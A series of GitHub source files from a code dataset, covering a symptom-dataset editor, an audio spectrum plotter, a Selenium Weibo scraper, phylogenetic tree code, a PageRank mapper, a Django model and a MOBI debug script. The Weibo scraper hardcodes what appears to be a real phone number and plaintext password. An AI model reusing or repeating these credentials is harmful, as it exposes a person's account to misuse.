SYMPTOM\n# ## -> Update Dataset On Exit\n\nimport numpy as np\nimport pandas as pd\nimport os , shutil\nimport re\nfrom prettytable import PrettyTable\nfrom sklearn.naive_bayes import MultinomialNB\nfrom Decision_Tree.decision_tree import train_decision_tree_model\nfrom K_Nearest_Neighbors.knn import train_KNN_model\nfrom Kernel_SVM.kernel_svm import train_SVC_model\nfrom Logistic_Regression.logistic_regression import train_Logistic_regression_model\nfrom Naive_Bayes.naive_bayes import train_naive_bayes_model\nfrom Random_Forest.random_forest import train_random_forest_model\n\n\ndef clear():\n os.system('cls')\n\n\ndef save_on_exit(num , dataset_copy):\n if not os.path.exists(os.getcwd() + '\Datasets\SHDPS_ARCHIVE'):\n os.mkdir(os.getcwd() + '\Datasets\SHDPS_ARCHIVE')\n if not dataset.equals(dataset_copy):\n shutil.move(ORIGINAL , DESTINATION)\n dataset_copy.to_csv(f'Datasets/SHDPS_Training_{num+1}.csv')\n print("---------DATASET SAVED SUCCESSFULLY-----------\\nThanks For Using...")\n exit()\n else:\n # clear()\n print("---------DATASET Wasn't ALTERED-----------\\nThanks For Using...")\n exit()\n\n\ndef train_all_ML_models(dataset_copy):\n clear()\n print('Processing.........\\nPlease Wait.')\n train_decision_tree_model(dataset_copy)\n train_KNN_model(dataset_copy)\n train_SVC_model(dataset_copy)\n train_Logistic_regression_model(dataset_copy)\n train_naive_bayes_model(dataset_copy)\n train_random_forest_model(dataset_copy)\n clear()\n print('-----------ALL MODELS TRAINED SUCCESSFULLY---------------')\n\n\n# ### TASK -> See Symptoms Arranged ALPHABETICALLY\n\ndef see_symptoms():\n clear()\n symptoms = list(dataset_copy.columns[1:])\n first_alpha = set([symptom[0] for symptom in symptoms])\n ask_first_alpha = input('Enter the First Alphabet of the symptom which you want to look up\\n :: ').lower()\n while ask_first_alpha not in first_alpha:\n print('----------No Symptom Found--------------')\n ask_first_alpha = input('Enter the First Alphabet of the Symptom which you want to look up\\n :: ').lower()\n myTable = PrettyTable([ 'ID' , f'SYMPTOMS Starting with \"{ask_first_alpha.upper()}\"'])\n for 
index , symptom in enumerate(symptoms):\n if symptom.startswith(ask_first_alpha):\n myTable.add_row([index+1 , symptom])\n clear()\n print(myTable)\n\n\n# ### TASK -> SEARCH for SYMPTOMS \n\ndef search_symptoms():\n clear()\n asked_symptom = input('Enter the Symptom which you want to Search\\n :: ').lower()\n retrived_matches = list(set(list(dataset.filter(like=asked_symptom , axis=1).columns) + list(dataset.filter(regex=f'^{asked_symptom}' , axis = 1).columns) + list(dataset.filter(regex=f'^{asked_symptom[0:2]}' , axis = 1).columns)))\n if len(retrived_matches) != 0:\n myTable = PrettyTable([ 'ID' , f'Symptoms matching with \"{asked_symptom.upper()}\"'])\n for index , row in enumerate(retrived_matches):\n myTable.add_row([index+1 , row])\n print(myTable)\n else:\n print('\\t---------No Matches Found------------')\n\n\n# ### TASK -> ADD SYMPTOM TO DATASET\n\ndef add_symptom():\n clear()\n symptom_to_add = input("Enter Symptom to ADD (PLEASE VERIFY IF IT'S PRESENT)\\n :: ").lower()\n symptom_to_add = '_'.join(symptom_to_add.split())\n if symptom_to_add in dataset_copy.columns[1:]:\n print('----------Symptom Already Present----------------')\n else:\n dataset_copy[symptom_to_add] = 0\n print('-------------Symptom Successfully ADDED------------')\n\n\n# ### TASK -> ADD DISEASE \n\n# dataset_copy.loc[dataset_copy.shape[0]] = ['Cancer'] + [0] * len(dataset_copy.columns[1:])\n# dataset_copy.drop(index=4920 , inplace=True)\n\ndef first_character_approach(disease):\n clear()\n user_decision = 'Y'\n symptoms_to_add = []\n while True:\n clear()\n user_decision = input(f'Do you want to ADD MORE Symptoms for {disease.upper()} ( Y- YES , N - NO) (MINIMUM - 5)\\n :: ').upper()\n if user_decision != 'Y':\n break\n symptoms = list(dataset_copy.columns[1:])\n first_alpha = set([symptom[0] for symptom in symptoms])\n ask_first_alpha = input('Enter the First Alphabet of the symptom which you want to look up\\n :: ').lower()\n while ask_first_alpha not in first_alpha:\n print('----------No Symptom Found--------------')\n ask_first_alpha = input('Enter the First Alphabet of the Symptom which you want to look up\\n :: ').lower()\n myTable = PrettyTable([ 'ID' , f'SYMPTOMS Starting with \"{ask_first_alpha.upper()}\"'])\n for index , symptom in enumerate(symptoms):\n if symptom.startswith(ask_first_alpha):\n myTable.add_row([index+1 , symptom])\n clear()\n myTable.sortby = f'SYMPTOMS Starting with \"{ask_first_alpha.upper()}\"'\n myTable.align[f'SYMPTOMS Starting with \"{ask_first_alpha.upper()}\"'] = 'r'\n print(myTable)\n symptoms_to_add_str = input('Enter the ID Corresponding to the SYMPTOMS which you want to ADD(\"SPACE SEPARATED\") or PRESS ENTER to skip\\n :: ') or None\n if symptoms_to_add_str != None:\n symptoms_to_add_str = list(map(int , symptoms_to_add_str.split()))\n id_check = True\n for symptom_id in symptoms_to_add_str:\n if symptom_id not in range(1 , len(dataset_copy.columns[1:])+1):\n id_check = False\n if not id_check:\n clear()\n print("-----------One or More IDs were OUT OF RANGE----------------- !\\n TRY AGAIN!!")\n else:\n symptoms_to_add = symptoms_to_add + symptoms_to_add_str\n symptoms_names = [0]*len(dataset_copy.columns[1:])\n for i in range(1 , len(dataset_copy.columns[1:])+1):\n if i in symptoms_to_add:\n symptoms_names[i-1] = 1\n return symptoms_names\n\n\ndef full_symptom_table_approach():\n clear()\n all_symtoms = enumerate(dataset_copy.columns[1:])\n myTable = PrettyTable(['ID' , 'ALL SYMPTOMS'])\n for row in all_symtoms:\n myTable.add_row([row[0]+1 , row[1]])\n myTable.sortby = 'ALL 
SYMPTOMS'\n    myTable.align['ALL SYMPTOMS'] = 'r'\n    print(myTable)\n    symptoms_to_add = input('Enter the ID Corresponding to the SYMPTOMS which you want to ADD (\"SPACE SEPARATED\")\\n :: ')\n    symptoms_to_add = list(map(int , symptoms_to_add.split()))\n    id_check = True\n    for symptom_id in symptoms_to_add:\n        if symptom_id not in range(1 , len(dataset_copy.columns[1:])+1):\n            id_check = False\n    if not id_check:\n        clear()\n        print(\"-----------One or More IDs were OUT OF RANGE-----------------!\\n TRY AGAIN!!\")\n        return full_symptom_table_approach()\n    else:\n        symptoms_names = [0]*len(dataset_copy.columns[1:])\n        for i in range(1 , len(dataset_copy.columns[1:])+1):\n            if i in symptoms_to_add:\n                symptoms_names[i-1] = 1\n#                symptoms_names[i-1] = dataset_copy.columns[1:][i-1]\n        return symptoms_names\n\n\ndef add_disease():\n    clear()\n    disease_to_add = input('Enter the Name of the Disease\\n :: ').title()\n    choice_1 = input(f'Do you want to ADD symptoms for {disease_to_add} (Y - YES , X - DISCARD)\\n :: ').upper()\n    choice_2 = input('-----------AVAILABLE METHODS-------------\\n\\n 1. First Character Approach\\n 2. FULL SYMPTOM TABLE APPROACH\\n :: ')\n    while (choice_1 not in ['Y' , 'X']) or not choice_2.isnumeric():\n        clear()\n        print('----------One of the inputs was INVALID!------------')\n        choice_1 = input(f'Do you want to ADD symptoms for {disease_to_add} (Y - YES , X - DISCARD) :: ').upper() or 'Y'\n        choice_2 = input('-----------AVAILABLE METHODS-------------\\n\\n 1. First Character Approach\\n 2. FULL SYMPTOM TABLE APPROACH\\n') or '1'\n    if choice_1 == 'Y' and choice_2 == '1':\n        symptoms_to_add = first_character_approach(disease_to_add)\n        if symptoms_to_add.count(1) >= 5:\n            dataset_copy.loc[dataset_copy.shape[0]] = [disease_to_add] + symptoms_to_add\n            clear()\n            print('-------------DISEASE ADDED SUCCESSFULLY-------------')\n        else:\n            print(f'---------Minimum Five Symptoms essential for Registering {disease_to_add}----------')\n    elif choice_1 == 'Y' and choice_2 == '2':\n        symptoms_to_add = full_symptom_table_approach()\n        if symptoms_to_add.count(1) >= 5:\n            dataset_copy.loc[dataset_copy.shape[0]] = [disease_to_add] + symptoms_to_add\n            clear()\n            print('-------------DISEASE ADDED SUCCESSFULLY-------------')\n        else:\n            print(f'---------Minimum Five Symptoms essential for Registering {disease_to_add}----------')\n    else:\n        clear()\n        print('-------Disease was DISCARDED---------')\n\n \n\nif __name__ == \"__main__\":\n    dirs = os.listdir('Datasets/')\n    dirs = dirs[1]\n    num = int(re.findall(r'[0-9]+' , dirs)[0])\n    ORIGINAL = os.getcwd() + rf'\Datasets\SHDPS_Training_{num}.csv'\n    DESTINATION = os.getcwd() + rf'\Datasets\SHDPS_ARCHIVE\SHDPS_Training_{num}(ARCHIVED).csv'\n    # dataset = pd.read_csv(ORIGINAL , index_col='prognosis')\n    headers = [*pd.read_csv(ORIGINAL, nrows=1)]\n    dataset = pd.read_csv(ORIGINAL, usecols=[c for c in headers if c != 'Unnamed: 0'])\n    dataset_copy = dataset.copy(deep=True)\n\n    while True:\n        user_input = input('\\t------------PROGRAM TO ADD DISEASES TO SHDPS DATASET-----------------\\n 1. SEE AVAILABLE SYMPTOMS\\n 2. SEARCH FROM AVAILABLE SYMPTOMS\\n 3. ADD SYMPTOM\\n 4. ADD DISEASE\\n 5. RE-TRAIN ALL ML MODELS\\n 6. 
SAVE & EXIT\\n :: ')\n        if user_input == '1':\n            see_symptoms()\n        elif user_input == '2':\n            search_symptoms()\n        elif user_input == '3':\n            add_symptom()\n        elif user_input == '4':\n            add_disease()\n        elif user_input == '5':\n            train_all_ML_models(dataset_copy=dataset_copy)\n        elif user_input == '6':\n            save_on_exit(num=num , dataset_copy=dataset_copy)\n        else:\n            clear()\n            print('--------INVALID INPUT-----------')","repo_name":"ubed90/Django_Disease_Prediction_Archived","sub_path":"SHDPS_MODEL_SELECTION/SHDPS_DISEASE_ADDITION.py","file_name":"SHDPS_DISEASE_ADDITION.py","file_ext":"py","file_size_in_byte":10428,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"65"} +{"seq_id":"32482155244","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\nfrom pyqtgraph.Qt import QtGui, QtCore\nimport numpy as np\nimport pyqtgraph as pg\nfrom pyqtgraph.ptime import time\nimport pyaudio\nimport sys\nFORMAT = pyaudio.paInt16  # We use 16 bit format per sample\nCHANNELS = 1\nRATE = 44100\n# RATE = 96000 \n# RATE = 48000 \nCHUNK = 1<<10  # 1024 bytes of data read from the buffer\n\napp = QtGui.QApplication([])\n\nwin = pg.GraphicsLayoutWidget(show=True, title=\"Basic plotting examples\")\nwin.resize(1000,600)\nwin.setWindowTitle('pyaudio pyqtgraph')\n\n# p = pg.plot()\np1 = win.addPlot()\np1.setLabel('bottom', 'time', units='sec')\np1.setRange(QtCore.QRectF(0, -1000, CHUNK/RATE, 2000)) \ncurve1 = p1.plot()\ndef makeBox(p):\n    p.showAxis('right', show=True)\n    p.getAxis('right').setStyle(showValues=False)\n    p.showAxis('top', show=True)\n    p.getAxis('top').setStyle(showValues=False)\n    p.showGrid(x=True, y=True)\nmakeBox(p1)\n\nwin.nextRow()\np = win.addPlot()\np.setTitle('Spectrum')\np.setLabel('bottom', 'frequency', units='Hz')\np.setLogMode(False, True)\np.setRange(QtCore.QRectF(0, 1, RATE/2, 3)) \nmakeBox(p)\ncurve = p.plot()\n\nlastTime = time()\nfps = None\n\ndef update(): \n    global curve, data, ptr, p, lastTime, fps, stream\n    # Fix program not exiting on closed window on mac\n    if not win.isVisible():\n        sys.exit(0)\n    done = False\n    while not done:\n        try:\n            in_data = stream.read(CHUNK, True)\n            done = True\n        except Exception as e:\n            # print(e)\n            if (e.errno==-9988):\n                stream.close()\n                init_stream()\n\n    data = np.frombuffer(in_data, dtype=np.int16)\n    x = np.arange(len(data))/RATE\n    y = data\n    curve1.setData(x, y, pen='r')\n    data = (data-data.mean()) * np.bartlett(len(data))\n    D = np.abs(np.fft.rfft(data))\n    f = np.arange(len(D))*RATE/CHUNK\n    curve.setData(f, D, pen='y')\n\n    now = time()\n    dt = now - lastTime\n    lastTime = now\n    if fps is None:\n        fps = 1.0/dt\n    else:\n        s = np.clip(dt*3., 0, 1)\n        fps = fps * (1-s) + (1.0/dt) * s\n    # p1.setTitle('%0.2f fps' % fps)\n    p1.setTitle('%0.2f' % (dt*1000))\n    app.processEvents()  ## force complete redraw for every plot\n    # win.repaint()\n\nif True:\n    timer = QtCore.QTimer()\n    timer.timeout.connect(update)\n    timer.start(0)\n\naudio = pyaudio.PyAudio()\n\n\n# Claim the microphone\ndef init_stream():\n    global stream\n\n    stream = audio.open(format=FORMAT,\n                channels=CHANNELS,\n                rate=RATE,\n                input_device_index = 1,\n                input=True)\n    # print(dir(stream))\n    stream.start_stream()\ninit_stream()\n\ndef show_devices():\n    # audio = pyaudio.PyAudio()\n    for i in range(audio.get_device_count()):\n        print (i, audio.get_device_info_by_index(i))\n\n## Start Qt event loop unless running in interactive mode.\nif __name__ == '__main__':\n    # import sys\n    # if (sys.flags.interactive != 1) or not hasattr(QtCore, 'PYQT_VERSION'):\n    #         
QtGui.QApplication.instance().exec_()\n    app.exec_()\n","repo_name":"saewoonam/audio","sub_path":"sa_old.py","file_name":"sa_old.py","file_ext":"py","file_size_in_byte":3054,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"28111389373","text":"#coding:utf-8\nfrom selenium import webdriver\nimport time\n\"\"\"Scrape the first 15 of Weibo's 24-hour trending topics (http://d.weibo.com/100803?cfs=&Pl_Discover_Pt6Rank__5_filter=hothtlist_type%3D1#_0);\nnote that pagination is required. Save the scraped content to a txt file, and capture the read count of each topic as well.\"\"\"\nclass HotWeibo_huati_Grasp():\n\tdef __init__(self):\n\t\tself.dr=webdriver.Chrome()\n\t\tself.dr.maximize_window()\n\t\tself.lg_url=\"http://weibo.com/\"\n\t\tself.base_url=\"http://d.weibo.com/100803?cfs=&Pl_Discover_Pt6Rank__5_filter=hothtlist_type%3D1#_0\"\n\tdef by_Name(self,name):\n\t\treturn self.dr.find_element_by_name(name)\n\tdef by_Xpath(self,xpath):\n\t\treturn self.dr.find_element_by_xpath(xpath)\n\tdef by_Xpaths(self,xpath):\n\t\treturn self.dr.find_elements_by_xpath(xpath)\n\tdef login_weibo(self,username,password):\n\t\tself.dr.get(self.lg_url)\n\t\ttime.sleep(3)\n\t\tself.by_Name(\"username\").send_keys(username)\n\t\tself.by_Name(\"password\").send_keys(password)\n\t\tself.by_Xpath(\"//div[@class='info_list login_btn']/a\").click()\n\t\ttime.sleep(3)\n\tdef grasp(self):\n\t\t# Call the login module\n\t\tself.login_weibo(\"18801340078\",\"wq15803863660\")\n\t\tself.dr.get(self.base_url)\n\t\tlist_=self.by_Xpaths(\"//ul[@class='pt_ul clearfix']//a[@target='_blank']\")\n\t\ttime.sleep(3)\n\t\tfile_=open(\"test.txt\",'w+')\n\t\tread_num=[]\n\t\thot_weibo=[]\n\t\tfor i in list_:\n\t\t\tif \"#\" in i.text:\n\t\t\t\thot_weibo.append(i.text[1:-1])  # list of trending topic titles\n\t\tfor i in self.by_Xpaths(\"//span[@class='number']\"):\n\t\t\tread_num.append(i.text)  # read counts of the trending topics\n\t\t# Write the results to the txt file\n\t\tfor i in range(len(hot_weibo)): \n\t\t\tseparator=\"\\n********************\\n\"\n\t\t\tfile_.write(hot_weibo[i].encode('utf-8'))\n\t\t\t\n\t\t\tfile_.write(read_num[i].encode('utf-8'))\n\t\t\tfile_.write(separator)\n\t\tfile_.close()\n\t\tself.dr.quit()\n\t\t\t\nif __name__ == '__main__':\n\tweibo=HotWeibo_huati_Grasp()\n\tweibo.grasp()\n","repo_name":"qwangzone/pachong","sub_path":"hotweibo_huati_grasp.py","file_name":"hotweibo_huati_grasp.py","file_ext":"py","file_size_in_byte":1798,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"74364041487","text":"import logging\nimport torch\nimport torch.nn as nn\nimport numpy as np\nfrom dataclasses import dataclass\n\n\n@dataclass\nclass TreeNode:\n    index: int\n    parent: int\n    children: list[int]\n    is_leaf: bool\n    is_root: bool\n\n\nclass TreeTopologyBase:\n    \"\"\" Tree topology\n    \"\"\"\n\n    @property\n    def parent_indices(self):\n        raise NotImplementedError\n\n    @property\n    def children_indices(self):\n        raise NotImplementedError\n\n    def preorder_traverse(self):\n        n_tips = self.n_tips\n        root_index = len(self.parent_indices)\n        stacks = [root_index]\n        parents = self.parent_indices\n        children = self.children_indices\n        while stacks:\n            idx = stacks.pop(0)\n            is_leaf = idx < n_tips\n            is_root = idx == root_index\n            node = TreeNode(index=idx, parent=-1 if is_root else parents[idx], children=children[idx], is_leaf=is_leaf, is_root=is_root)\n            yield node\n            for ch_idx in children[idx]:\n                stacks.append(ch_idx)\n\n    def postorder_traverse(self):\n        n_tips = self.n_tips\n        root_index = len(self.parent_indices)\n        stacks = [root_index]\n        nodes = []\n        parents = self.parent_indices\n        children = self.children_indices\n        while stacks:\n            idx = stacks.pop() 
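# (editor's note, an inference from the code rather than an original comment: the LIFO pop visits nodes depth-first, and the nodes[::-1] at the return restores postorder) original inline comment: 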
# take last\n is_leaf = idx < n_tips\n is_root = idx == root_index\n node = TreeNode(index=idx, parent=-1 if is_root else parents[idx], children=children[idx], is_leaf=is_leaf, is_root=is_root)\n nodes.append(node)\n for ch_idx in children[idx]:\n stacks.append(ch_idx)\n return iter(nodes[::-1])\n\n @property\n def rooted(self):\n raise NotImplementedError\n\n @property\n def n_tips(self):\n raise NotImplementedError\n\n @property\n def n_nodes(self):\n raise NotImplementedError\n\n @property\n def n_branches(self):\n raise NotImplementedError\n\n def as_ete_tree(self, taxon_names=None, branch_lengths=None):\n return convert_to_ete_tree(self, taxon_names=taxon_names, branch_lengths=branch_lengths)\n\n\ndef get_edge_index_tensor(utree: TreeTopologyBase): # torch.Tensor with shape (n_node, 3) # only available for binary utree\n assert not utree.rooted\n edges = [[] for _ in range(utree.n_nodes)]\n for i, idx in enumerate(utree.parent_indices):\n edges[i].append(idx)\n for i, idxs in enumerate(utree.children_indices):\n if idxs:\n edges[i].extend(idxs)\n else:\n edges[i].extend([-1, -1])\n return torch.as_tensor(edges, dtype=torch.long)\n\n\n# Original code from https://github.com/zcrabbit/vbpi-gnn/blob/963045d9568019eeace0d115d41321b51e18d4ce/gnn_branchModel.py#L30-L67\n# Reference: C.Zhang (ICLR 2023)\ndef get_learnable_feature(utree: TreeTopologyBase): # torch.Tensor with shape (n_node,)\n assert not utree.rooted\n n_tips = utree.n_tips\n n_nodes = utree.n_nodes\n leaf_features = torch.eye(n_tips)\n #c = torch.zeros((n_nodes,))\n c = torch.zeros((n_nodes, n_tips))\n d = torch.zeros((n_nodes, n_tips))\n f = torch.zeros((n_nodes, n_tips))\n\n for node in utree.postorder_traverse(): # root node is definitely not a leaf node\n idx = node.index\n #print (node)\n if node.is_leaf:\n #c[idx] = c[idx] #0.\n d[idx] = leaf_features[idx]\n else:\n ch_c_sum = c[node.children].sum(dim=0)\n ch_d_sum = d[node.children].sum(dim=0)\n c[idx] = 1./(3. 
- ch_c_sum)\n            d[idx] = c[idx] * ch_d_sum\n\n    for node in utree.preorder_traverse():\n        idx = node.index\n        if not node.is_root:\n            d[idx] = c[idx] * d[node.parent] + d[idx]\n            #f[idx] = d[idx]\n\n    return d\n\n\ndef convert_to_ete_tree(tree: TreeTopologyBase, taxon_names=None, use_branch_length=None, branch_lengths=None):\n    import ete3\n    if taxon_names is None:\n        taxon_names = [str(i+1) for i in range(tree.n_tips)]\n    assert len(taxon_names) == tree.n_tips, taxon_names\n    taxons = dict(enumerate(taxon_names))  # index to taxon name\n    if branch_lengths is None:\n        if use_branch_length is None:\n            use_branch_length = isinstance(tree, TreeMetricBase)\n        if use_branch_length:\n            ch_blens = tree.branch_lengths.detach().cpu().numpy()\n        else:\n            ch_blens = None\n    else:\n        ch_blens = branch_lengths.detach().cpu().numpy()\n\n    root_idx = max(tree.parent_indices)\n    ete_root = ete3.Tree()\n    idx_ete_nodes = {root_idx: ete_root}\n\n    for node in tree.preorder_traverse():\n        if node.is_leaf:\n            continue\n        ete_node = idx_ete_nodes.pop(node.index)\n        for ch_idx in node.children:\n            name = taxons.get(ch_idx)\n            props = {'name': name}\n            if ch_blens is not None:\n                props['dist'] = ch_blens[ch_idx]\n            ete_ch_node = ete_node.add_child(**props)\n            if name is None:  # internal\n                idx_ete_nodes[ch_idx] = ete_ch_node\n\n    return ete_root\n\n\nclass TreeMetricBase(TreeTopologyBase):\n    \"\"\" Tree topology and edge lengths\n    \"\"\"\n\n    @property\n    def n_branches(self):\n        return len(self.branch_lengths)\n\n    @property\n    def branch_lengths(self):\n        raise NotImplementedError\n\n\nclass TreeMetric(TreeMetricBase):\n    @property\n    def parent_indices(self):\n        return self._parent_indices\n\n    @property\n    def children_indices(self):\n        return self._children_indices\n\n    @property\n    def n_tips(self):\n        return self._n_tips\n\n    @property\n    def n_nodes(self):\n        return self._n_nodes\n\n    @property\n    def rooted(self):\n        return self._rooted\n\n    @property\n    def branch_lengths(self):\n        return self._branch_lengths\n\n    def __init__(self, parent_indices, branch_lengths, rooted=True):\n        self._parent_indices = np.asarray(parent_indices)  # should not be a tensor\n        children_indices = [[] for _ in range(len(self._parent_indices) + 1)]  # TODO efficiency?\n        for idx, pa_idx in enumerate(self._parent_indices):\n            children_indices[pa_idx].append(idx)\n        self._children_indices = children_indices\n        self._n_tips = min(self._parent_indices)\n        self._n_nodes = len(self._parent_indices) + 1\n        self._branch_lengths = torch.as_tensor(branch_lengths)\n        self._rooted = rooted\n\n    def get_unrooted(self):\n        assert self.rooted, 'only apply once to binary rooted tree'\n        root_idx = max(self.parent_indices)  # list\n        assert self.parent_indices[-1] == root_idx  # the last parent idx should be the current root\n        new_root_idx = root_idx - 1\n        root_child_idxs = np.arange(len(self.parent_indices))[self.parent_indices == root_idx]\n        assert len(root_child_idxs) == 2, (root_child_idxs, root_idx, self.parent_indices, self.parent_indices == root_idx)\n        new_branch_lengths = self.branch_lengths[:-1].clone().detach()\n        new_branch_lengths[root_child_idxs[0]] = self.branch_lengths[root_child_idxs].sum()  # merge blens values to new_root\n        new_parent_indices = self.parent_indices[:-1]\n        new_parent_indices[root_child_idxs[0]] = new_root_idx\n        #new_parent_indices = [min(i, new_root_idx) for i in self.parent_indices[:-1]]\n        return self.__class__(parent_indices=new_parent_indices, branch_lengths=new_branch_lengths, rooted=False)\n\n    def clone(self, branch_lengths=None):\n        blens = self.branch_lengths if branch_lengths is None 
else branch_lengths\n        assert len(blens) == len(self.branch_lengths)\n        return self.__class__(parent_indices=self.parent_indices, branch_lengths=blens, rooted=self.rooted)\n\n\nclass TipEmbedBase:\n    \"\"\"\n    - coord (N, d)\n    \"\"\"\n    def detach(self):\n        raise NotImplementedError\n\n\nclass TipEmbedModelBase(nn.Module):\n    @property\n    def state_size(self) -> torch.Size:\n        raise NotImplementedError\n\n    @torch.no_grad()\n    def sample_embeds(self, mc_samples=1):\n        return self.rsample_embeds(mc_samples=mc_samples)\n\n    def rsample_embeds(self, mc_samples=1):\n        raise NotImplementedError\n\n    def log_prior(self, embed: TipEmbedBase):\n        raise NotImplementedError\n\n    def get_mean_distance_matrix(self):\n        return self.mean_distance_matrix\n\n\nclass CondEmbedModelBase(nn.Module):\n    \"\"\"\n    \"\"\"\n    def get_log_prob(self, embed: TipEmbedBase, utree_metric: TreeMetricBase):\n        \"\"\"\n        Returns log p(tip_embed | utree_metric)\n        \"\"\"\n        raise NotImplementedError\n","repo_name":"m1m0r1/geophy","sub_path":"geophy/embeddings/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":8547,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"7463237201","text":"#!/usr/bin/env python\n\n\n__license__ = 'GPL v3'\n__copyright__ = '2012, Kovid Goyal '\n__docformat__ = 'restructuredtext en'\n\nimport sys, os, shutil\n\nfrom calibre.ebooks.mobi.debug.headers import MOBIFile\nfrom calibre.ebooks.mobi.debug.mobi6 import inspect_mobi as inspect_mobi6\nfrom calibre.ebooks.mobi.debug.mobi8 import inspect_mobi as inspect_mobi8\n\n\ndef inspect_mobi(path_or_stream, ddir=None):  # {{{\n    stream = (path_or_stream if hasattr(path_or_stream, 'read') else\n            open(path_or_stream, 'rb'))\n    f = MOBIFile(stream)\n    if ddir is None:\n        ddir = 'decompiled_' + os.path.splitext(os.path.basename(stream.name))[0]\n    try:\n        shutil.rmtree(ddir)\n    except:\n        pass\n    os.makedirs(ddir)\n    if f.kf8_type is None:\n        inspect_mobi6(f, ddir)\n    elif f.kf8_type == 'joint':\n        p6 = os.path.join(ddir, 'mobi6')\n        os.mkdir(p6)\n        inspect_mobi6(f, p6)\n        p8 = os.path.join(ddir, 'mobi8')\n        os.mkdir(p8)\n        inspect_mobi8(f, p8)\n    else:\n        inspect_mobi8(f, ddir)\n\n    print('Debug data saved to:', ddir)\n\n# }}}\n\n\ndef main():\n    inspect_mobi(sys.argv[1])\n\n\nif __name__ == '__main__':\n    main()\n","repo_name":"kovidgoyal/calibre","sub_path":"src/calibre/ebooks/mobi/debug/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1194,"program_lang":"python","lang":"en","doc_type":"code","stars":17176,"dataset":"github-code","pt":"65"} +{"seq_id":"9026199834","text":"#!/usr/bin/env python\n\nimport sys\n\nrankFormat = '%s\\t%s\\n'\nnodeFormat = '%s\\t,%s\\n'\nrankPrevFormat = 'RP\\t%s,%s\\n'\n\ndef read_input(f):\n    for line in iter(f.readline, ''):\n        yield line.rstrip('\\n').split('\\t', 1)\n\ndef main():\n    for (key, value) in read_input(sys.stdin):\n\n        # key.startswith('FinalRank:')\n        if key[0] == 'F':\n            # Remove tag\n            rank = key[10:]\n\n            nodeid = value\n\n            if rank == '':\n                sys.stdout.write('%s\\tF\\n' % (nodeid, ))\n            else:\n                sys.stdout.write('%s\\tF,%s\\n' % (nodeid, rank))\n\n        # key.startswith('NodeId:')\n        elif key[0] == 'N':\n            # Remove tag\n            nodeid = key[7:]\n\n            # Take all neighbors as one string in attr[2], if there are any\n            attr = value.split(\",\", 2)\n\n            rankCurr = float(attr[0])\n\n            # Current PR for later reference\n            sys.stdout.write('%s\\tR,%s\\n' % (nodeid, attr[0]))\n\n            if len(attr) == 2:\n                # No outgoing edges so give all PR to itself\n                sys.stdout.write(rankFormat % (nodeid, attr[0]))\n            
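# (editor's illustrative example; the R/E tags and tab-separated layout are read off the code above)\n            # an input line \"NodeId:A\\t0.5,p,B,C\" would emit:\n            #   A\\tR,0.5              (current rank, kept for the reducer)\n            #   A\\tE,B,C              (edge list, so the reducer can rebuild the node)\n            #   B\\t0.25 and C\\t0.25   (equal shares of A's rank, one per neighbor)\n            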
else:\n # Get neighbors as a list\n neighbors = attr[2].split(',')\n\n # Divide current PR into (degree) equal pieces\n rankToGive = rankCurr / len(neighbors)\n\n # Emit its neighbors in order to glue them back later\n sys.stdout.write('%s\\tE,%s\\n' % (nodeid, attr[2]))\n\n # For each neighbor, emit PR\n sys.stdout.write(''.join([rankFormat % (nb, rankToGive) for nb in neighbors]))\n\nif __name__ == '__main__':\n main()\n","repo_name":"yingyuho/rankmaniac","sub_path":"data/pagerank_map.py","file_name":"pagerank_map.py","file_ext":"py","file_size_in_byte":1690,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"15705069096","text":"#!/usr/bin python3\n\n# Imports\n# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n# Python:\n\n# 3rd party:\nfrom django.utils.translation import gettext as _\nfrom django.db import models\n\nfrom django_multitenant import mixins as mt_mixins\nfrom django_multitenant import models as mt_models\nfrom django_multitenant import fields as mt_fields\n\n# Internal: \nfrom .data import MetricReference\nfrom .fields import VarCharField\nfrom ..utils.default_generators import generate_unique_id\n\n# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n__all__ = [\n 'MetricETLReference'\n]\n\n\nclass MetricETLReference(models.Model):\n id = VarCharField(\n verbose_name=_(\"unique ID\"),\n max_length=36,\n primary_key=True,\n default=generate_unique_id\n )\n metric = models.OneToOneField(\n MetricReference,\n to_field='metric',\n db_column='metric_id',\n null=False,\n blank=False,\n on_delete=models.CASCADE\n )\n missing_to_zero = models.BooleanField(\n null=False,\n blank=False,\n default=False\n )\n fill_forward = models.BooleanField(\n null=False,\n blank=False,\n default=False\n )\n negative_to_zero = models.BooleanField(\n null=False,\n blank=False,\n default=False\n )\n prevalence_rate = models.BooleanField(\n null=False,\n blank=False,\n default=False\n )\n incidence_rate = models.BooleanField(\n null=False,\n blank=False,\n default=False\n )\n ratio_to_percentage = models.BooleanField(\n null=False,\n blank=False,\n default=False\n )\n rolling_sum_direction = models.BooleanField(\n null=False,\n blank=False,\n default=False\n )\n\n class Meta:\n managed = False\n db_table = 'covid19\".\"metric_etl_reference'\n verbose_name = _(\"ETL Metric\")\n verbose_name_plural = _(\"ETL Metrics\")\n","repo_name":"UKHSA-Internal/coronavirus-dashboard-management","sub_path":"app/service_admin/models/etl_metrics.py","file_name":"etl_metrics.py","file_ext":"py","file_size_in_byte":2009,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"65"} +{"seq_id":"42819160810","text":"import json\r\nimport os\r\nimport tensorflow as tf\r\n\r\nfrom recording import Recorder\r\nfrom preprocessing import EmptyFrameRemover\r\nfrom predict import Predictor\r\n\r\nfrom model import KeyModel\r\n\r\nminecraft_json = 'D:/Python Projects/gameBot/saves/minecraft.json'\r\nrecorded_csv = 'D:/Python Projects/gameBot/recording output/minecraft_gameplay.csv'\r\nrecorded_avi = 'D:/Python 